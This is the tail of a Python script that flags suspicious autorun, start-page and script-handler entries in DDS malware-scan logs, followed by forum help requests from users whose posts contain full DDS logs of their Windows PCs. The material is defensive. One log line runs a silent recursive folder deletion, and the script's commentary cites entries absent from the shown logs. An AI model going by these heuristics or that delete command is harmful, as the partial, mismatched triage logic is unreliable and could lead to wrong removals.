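FILEEXT_RE = re.compile(r"^FileExt: (\.\w+): (.+)$")
UNREG_RE = re.compile(r"^(\.\w+): <filetype is not registered>$")


def target_path(cmd):
    """Return the executable a Run/Startup entry points at, lower-cased."""
    m = TARGET_RE.match(cmd.strip())
    return (m.group(1) or m.group(2)).lower()


def classify_path(path):
    if path.startswith(TRUSTED_PREFIXES):
        return "trusted_dir"
    if any(marker in path for marker in USER_WRITABLE):
        return "user_writable"
    return "other"  # bare names such as 'thpsrv' resolve via PATH; check separately


def page_host(url):
    url = re.sub(r"^(hxxps?|https?)://", "", url.strip().lower())
    return url.split("/", 1)[0].split("?", 1)[0]


def page_allowed(url):
    if url.strip().lower().startswith("about:"):
        return True
    host = page_host(url)
    return any(host == d or host.endswith("." + d) for d in ALLOWED_PAGE_DOMAINS)


def triage_hjt(lines):
    """Return (kind, key, detail) findings for the lines of a pseudo-HJT report."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if m := RUN_RE.match(line):
            name, cmd = m.groups()
            path = target_path(cmd)
            if classify_path(path) == "user_writable":
                findings.append(("autorun_user_writable", name, path))
        elif m := STARTUP_RE.match(line):
            lnk, cmd = m.groups()
            path = target_path(cmd)
            if classify_path(path) == "user_writable":
                findings.append(("startup_lnk_user_writable", lnk.lower(), path))
        elif m := (PAGE_RE.match(line) or FF_PAGE_RE.match(line)):
            key, url = m.groups()
            if not page_allowed(url):
                findings.append(("start_page_not_allowlisted", key, page_host(url)))
        elif m := FILEEXT_RE.match(line):
            ext, handler = m.groups()
            if ext.lower() in SCRIPT_EXTS:
                # handler looks like 'JSEFile=C:\...\WScript.exe "%1" %*'
                findings.append(("script_ext_handler", ext.lower(),
                                 target_path(handler.split("=", 1)[1])))
        elif m := UNREG_RE.match(line):
            if m.group(1).lower() in SCRIPT_EXTS:
                findings.append(("script_ext_unregistered", m.group(1).lower(), ""))
    return findings


def persistence_by_target(findings):
    """Group autorun/startup hits by executable: one binary persisted through
    two mechanisms is the strongest signal in a log like this."""
    by_path = defaultdict(list)
    for kind, key, path in findings:
        if kind.endswith("_user_writable"):
            by_path[path].append(f"{kind}:{key}")
    return dict(by_path)
```

Hits are leads, not verdicts: uTorrent legitimately runs out of Application Data, whereas a binary under All Users\iobakf that is persisted both through a Run key and a Startup-folder shortcut, alongside a home page pointed at yourtv.link, is the entry to investigate first. Entries with a bare name (`thpsrv`) are classified as `other` because the log does not say where they resolve.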

Sent here by Corday

I was instructed to come here and get checked.
I have been working with Corday on a failure to update issue. Last evening he gave me an update, KB3204723, and as soon as it rebooted after install the alert bubble over the updates icon on the taskbar said to look for updates. I posted that, and this morning he suggested I come here to get rechecked. I had a check last week after MWB found some viruses. I never deleted them from MWB, but they were gone when that check here was done.
The way it usually works on my machine is that it auto finds updates and then that icon appears when it finds some. In the last few months the icon is always there and when I click it the updates window tells me to look for updates instead of having updates ready.

I have the system discs I made per instructions when I first booted the machine.


DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16819 BrowserJavaVersion: 11.111.2
Run by Me at 9:34:29 on 2017-01-01
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.3963.1902 [GMT -8:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {71A27EC9-3DA6-45FC-60A7-004F623C6189}
SP: Microsoft Security Essentials *Enabled/Updated* {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\SearchIndexer.exe
c:\Program Files\Microsoft Security Client\NisSrv.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Windows\RAVCpl64.exe
C:\Windows\System32\igfxpers.exe
C:\Windows\System32\hkcmd.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Windows\ehome\ehtray.exe
C:\Windows\system32\igfxsrvc.exe
C:\Program Files (x86)\Toshiba\ConfigFree\NDSTray.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Toshiba\ConfigFree\CFSwMgr.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Windows\system32\wuauclt.exe
c:\Program Files\Microsoft Security Client\MpCmdRun.exe
c:\Program Files\Microsoft Security Client\MpCmdRun.exe
C:\Windows\splwow64.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = about:blank
mDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
BHO: Ghostery Plugin: {6BF739DD-3323-4C6A-975B-C7E00A50B154} - C:\Program Files (x86)\Ghostery\bin\ghostery.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll
uRun: [ehTray.exe] C:\Windows\ehome\ehTray.exe
mRun: [NDSTray.exe] NDSTray.exe
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\MICROS~1.LNK - C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-Explorer: NoDrives = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
DPF: {CAFEEFAC-0018-0000-0045-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{C12D3495-9B83-4917-A534-5FCF1ED20B86} : DHCPNameServer = 75.75.75.75 75.75.76.76
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
x64-Run: [TPwrMain] C:\Program Files (x86)\TOSHIBA\Power Saver\TPwrMain.EXE
x64-Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [SmoothView] C:\Program Files (x86)\Toshiba\SmoothView\SmoothView.exe
x64-Run: [Skytel] Skytel.exe
x64-Run: [RtHDVCpl] RAVCpl64.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HSON] C:\Program Files (x86)\TOSHIBA\TBS\HSON.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [00TCrdMain] C:\Program Files (x86)\TOSHIBA\FlashCards\TCrdMain.exe
x64-Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
x64-mPolicies-Explorer: NoDrives = dword:0
x64-mPolicies-System: EnableUIADesktopToggle = dword:0
x64-Notify: igfxcui - igfxdev.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\
FF - prefs.js: browser.startup.homepage - about:home
FF - prefs.js: network.proxy.type - 0
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_186.dll
.
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2016-8-25 295000]
R0 tos_sps64;TOSHIBA tos_sps64 Service;C:\Windows\System32\drivers\tos_sps64.sys [2015-5-9 504912]
R1 JSWPSLWF;JumpStart Wireless Filter Driver;C:\Windows\System32\drivers\jswpslwfx.sys [2015-5-9 26624]
R2 FontCache;Windows Font Cache Service;C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation [2008-1-20 27648]
R3 FwLnk;FwLnk Driver;C:\Windows\System32\drivers\FwLnk.sys [2008-8-18 8704]
R3 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2016-8-25 135928]
R3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\NisSrv.exe [2016-11-14 361816]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2016-8-1 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2016-8-1 124088]
S3 PerfHost;Performance Counter DLL Host;C:\Windows\SysWOW64\perfhost.exe [2008-1-20 19968]
S3 PSMounterEx;Macrium Reflect Image Explorer Driver;C:\Windows\System32\drivers\psmounterex.sys [2015-4-2 169992]
S3 PSVolAcc;PSVolAcc;C:\Windows\System32\drivers\PSVolAcc.sys [2014-7-21 12760]
S3 WIMMount;WIMMount;C:\Program Files\Macrium\Reflect\wimmount.sys [2015-5-14 22096]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\WPFFontCache_v0400.exe [2016-8-1 25800]
S4 clr_optimization_v2.0.50727_64;Microsoft .NET Framework NGEN v2.0.50727_X64;C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [2015-5-10 90776]
S4 ConfigFree Gadget Service;ConfigFree Gadget Service;C:\Program Files (x86)\Toshiba\ConfigFree\CFProcSRVC.exe [2008-4-3 36864]
S4 ConfigFree Service;ConfigFree Service;C:\Program Files (x86)\Toshiba\ConfigFree\CFSvcs.exe [2008-4-16 40960]
S4 jswpsapi;Jumpstart Wifi Protected Setup;C:\Program Files (x86)\Jumpstart\jswpsapi.exe [2015-5-9 954368]
S4 KR10I64;KR10I64;C:\Windows\System32\drivers\KR10I64.sys [2008-8-18 248320]
S4 KR10N64;KR10N64;C:\Windows\System32\drivers\KR10N64.sys [2008-8-18 237568]
S4 ReflectService.exe;Macrium Reflect Image Mounting Service;C:\Program Files\Macrium\Reflect\ReflectService.exe [2014-7-21 3272656]
S4 SmartFaceVWatchSrv;SmartFaceVWatchSrv;C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatchSrv.exe [2008-4-24 84992]
S4 TMachInfo;TMachInfo;C:\Program Files (x86)\Toshiba\TOSHIBA Service Station\TMachInfo.exe [2008-8-18 46392]
S4 TOSHIBA SMART Log Service;TOSHIBA SMART Log Service;C:\Program Files\TOSHIBA\SMARTLogService\TosIPCSrv.exe [2007-12-3 175104]
.
=============== File Associations ===============
.
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
.
=============== Created Last 30 ================
.
.
==================== Find3M ====================
.
2016-12-30 23:49:06 192216 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2016-12-13 19:04:42 802904 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2016-12-13 19:04:42 144472 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2016-11-08 15:49:57 2804736 ----a-w- C:\Windows\System32\win32k.sys
2016-11-02 16:16:24 383208 ----a-w- C:\Windows\System32\atmfd.dll
2016-11-02 16:09:14 48128 ----a-w- C:\Windows\System32\atmlib.dll
2016-11-02 16:06:50 306408 ----a-w- C:\Windows\SysWow64\atmfd.dll
2016-11-02 15:59:25 34304 ----a-w- C:\Windows\SysWow64\atmlib.dll
2016-10-28 01:22:26 485032 ------w- C:\Windows\System32\MpSigStub.exe
2016-10-19 17:24:56 97856 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2016-10-04 14:41:48 90112 ----a-w- C:\Windows\System32\drivers\bowser.sys
.
============= FINISH: 9:35:03.20 ===============

Attached Files
File Type: txt attach.txt (15.9 KB)

Possible Malware/Adware

I'm running Windows 8.1 and primarily use Google Chrome to access the internet. Sometimes my browser will redirect to a random survey site out of nowhere. I've run a virus scan using AVG and a malware scan using MalwareBytes, but neither has detected or removed the problem.

I was unable to download and run DDS, so I downloaded and ran Farbar Recovery Scan Tool instead, and have attached the two txt files the scan produced.

Attached Files
File Type: txt FRST.txt (50.8 KB)
File Type: txt Addition.txt (42.9 KB)

Two Pesky Viruses I cannot remove - Win.Trojan.Agent-5331045-0 HELP......

Hello,

Need a little assistance with two viruses that keep coming up in ClamWin scans.

These two files get flagged each time I run this scan:
C:\Windows\assembly\NativeImages_v2.0.50727_32\MSBuild\fcf362b1b376f26213544099deb80ea2\MSBuild.ni.exe: Win.Trojan.Agent-5331045-0 FOUND

C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\80d1ac155ebe0ec86c15490d0c15f04e\Microsoft.PowerShell.ConsoleHost.ni.dll: Win.Trojan.Agent-5312173-0 FOUND


Malwarebytes and Windows Defender find nothing when I run them, and after I delete these, they come back.

DDS Scan:
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.14393.0
Run by Op980 at 8:43:23 on 2017-01-06
Microsoft Windows 10 Pro 10.0.14393.0.1252.1.1033.18.8182.6313 [GMT -8:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Windows\system32\nvvsvc.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\WINDOWS\system32\nvvsvc.exe
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\spoolsv.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Canon\DIAS\CnxDIAS.exe
C:\Windows\SysWOW64\ASTSRV.EXE
C:\Program Files (x86)\DYMO\DYMO Label Software\DymoPnpService.exe
C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
C:\WINDOWS\system32\svchost.exe -k iissvcs
C:\WINDOWS\system32\svchost.exe -k apphost
C:\WINDOWS\system32\mqsvc.exe
C:\Program Files\Common Files\Nitro PDF\Express\2.0\NitroPDFExpressDriverServicex64.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\WINDOWS\system32\dashost.exe
C:\Windows\System32\WUDFHost.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\Windows\System32\WUDFHost.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
C:\Program Files (x86)\TeamViewer\TeamViewer.exe
C:\WINDOWS\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files (x86)\TeamViewer\tv_w32.exe
C:\Program Files (x86)\TeamViewer\tv_x64.exe
C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.1.41.0_x64__8wekyb3d8bbwe\Microsoft.StickyNotes.exe
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgentUserBroker.exe
C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
C:\Program Files\Canon\Canon MF Network Scan Utility\CNMFSUT6.EXE
C:\Program Files\Windows Defender\MSASCuiL.exe
C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe
C:\Program Files (x86)\DYMO\DYMO Label Software\DymoQuickPrint.exe
C:\Program Files (x86)\ClamWin\bin\ClamTray.exe
C:\Windows\System32\SystemSettingsBroker.exe
C:\Program Files\CCleaner\CCleaner64.exe
C:\Program Files\Windows Defender\MpCmdRun.exe
C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.145.0_x64__kzf8qxf38zg5c\SkypeHost.exe
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\WINDOWS\system32\AUDIODG.EXE
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\Windows\System32\smartscreen.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uSearch Bar = Preserve
uRun: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
uRun: [Fitbit Connect] "C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe" /autorun
uRun: [7 Taskbar Tweaker] "C:\Users\Op980\AppData\Roaming\7+ Taskbar Tweaker\7+ Taskbar Tweaker.exe" -hidewnd
uRun: [DymoQuickPrint] "C:\Program Files (x86)\DYMO\DYMO Label Software\DymoQuickPrint.exe" /startup
uRun: [eFax 4.4] "C:\Program Files (x86)\eFax Messenger 4.4\J2GDllCmd.exe" /R
uRun: [OneDrive] "C:\Users\Op980\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRunOnce: [Uninstall C:\Users\Op980\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64] C:\WINDOWS\System32\cmd.exe /q /c rmdir /s /q "C:\Users\Op980\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64"
mRun: [ClamWin] "C:\Program Files (x86)\ClamWin\bin\ClamTray.exe" --logon
mRun: [SunJavaUpdateSched] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
mRun: [PMSpeed9.39.10] C:\Program Files (x86)\NewSoft\Presto! PageManager 9.39\PMSpeed.EXE
mRun: [Canon Toner Status] C:\Program Files (x86)\Canon\OIPTonerStatus\CnTnrStsTask.exe
mRun: [ProductUpdater] C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-System: DSCAutomationHostEnabled = dword:2
IE: E&xport to Microsoft Excel - C:\Program Files (x86)\Microsoft Office\Office10\EXCEL.EXE/3000
IE: SafeKey Fill Forms - C:\Users\Op980\AppData\LocalLow\SafeKey\context.html?cmd=fillforms
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{0d1f47eb-cfb7-47c0-8e9e-4be045c4fb01} : DHCPNameServer = 75.75.75.75 75.75.76.76
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-mStart Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wcg_fremkfs_16_39&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0A0CtBtBtD0BzytC0DyEyEtDtAzzyDtCtN0D0Tzu0StCyBtAyCtN1L2XzutAtFtByEtFyCtFyDtBtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StC0E0E0BtBzz0DyBtGtAyCyD0DtGyDyB0BtAtGyE0Ezy0CtGtCtAzy0CtD0CtCyDzyzztCtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0C0CtAyDtCyC0F0AtGyC0CzzyBtGyE0B0CyEtGzytB0C0DtGzz0CyC0EzzzztBtB0B0DtCzz2QtN0A0LzutB%26cr%3D1456597161%26a%3Dwcg_fremkfs_16_39%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
x64-Run: [MFNetworkScanUtility] C:\Program Files\Canon\Canon MF Network Scan Utility\CNMFSUT6.EXE
x64-Run: [WindowsDefender] "C:\Program Files (x86)\Windows Defender\MSASCuiL.exe"
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Op980\AppData\Roaming\Mozilla\Firefox\Profiles\hrzcafzz.default\
FF - prefs.js: browser.search.selectedEngine - Yahoo! Powered
FF - prefs.js: browser.startup.homepage - www.yahoo.com
FF - prefs.js: keyword.URL - true
FF - plugin: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\DYMO\DYMO Label Software\Framework\npDYMOLabelFramework.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Users\Op980\AppData\Local\Citrix\Plugins\104\npappdetector.dll
FF - plugin: C:\Users\Op980\AppData\Roaming\Zoom\bin\npzoomplugin.dll
FF - plugin: C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll
.
============= SERVICES / DRIVERS ===============
.
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2016-7-16 48152]
R0 iorate;iorate;C:\WINDOWS\System32\drivers\iorate.sys [2016-11-8 48992]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2016-7-16 16224]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2016-7-16 107032]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2016-7-16 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2016-10-17 199008]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2016-10-28 227328]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2016-7-16 88576]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2016-7-16 8192]
R2 BRA_Scheduler;Brother BRAdminPro Scheduler;C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe [2013-6-16 98304]
R2 CDPUserSvc_48d4a;CDPUserSvc_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 clreg;Virtual Registry for Containers;C:\WINDOWS\System32\drivers\registry.sys [2016-7-16 70144]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2016-7-16 44496]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc [2016-7-16 44496]
R2 DymoPnpService;DYMO PnP Service;C:\Program Files (x86)\DYMO\DYMO Label Software\DymoPnpService.exe [2014-2-3 33072]
R2 Fitbit Connect;Fitbit Connect Service;C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [2013-2-25 1239584]
R2 NitroExpressDriverReadSpool;NitroPDFExpressDriverCreatorReadSpool;C:\Program Files\Common Files\Nitro PDF\Express\2.0\NitroPDFExpressDriverServicex64.exe [2009-10-6 324912]
R2 NvStreamSvc;NVIDIA Streamer Service;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2016-9-4 2521024]
R2 OneSyncSvc_48d4a;Sync Host_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2016-7-16 78336]
R2 TeamViewer;TeamViewer 12;C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [2014-12-11 10351856]
R2 tiledatamodelsvc;Tile Data model server;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R2 UMVPFSrv;UMVPFSrv;C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe [2011-12-14 450848]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2016-10-17 119648]
R2 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2016-7-16 66560]
R2 WpnService;Windows Push Notifications System Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 e1kexpress;Intel(R) Network Connections Driver K;C:\WINDOWS\System32\drivers\e1k63x64.sys [2013-2-20 498032]
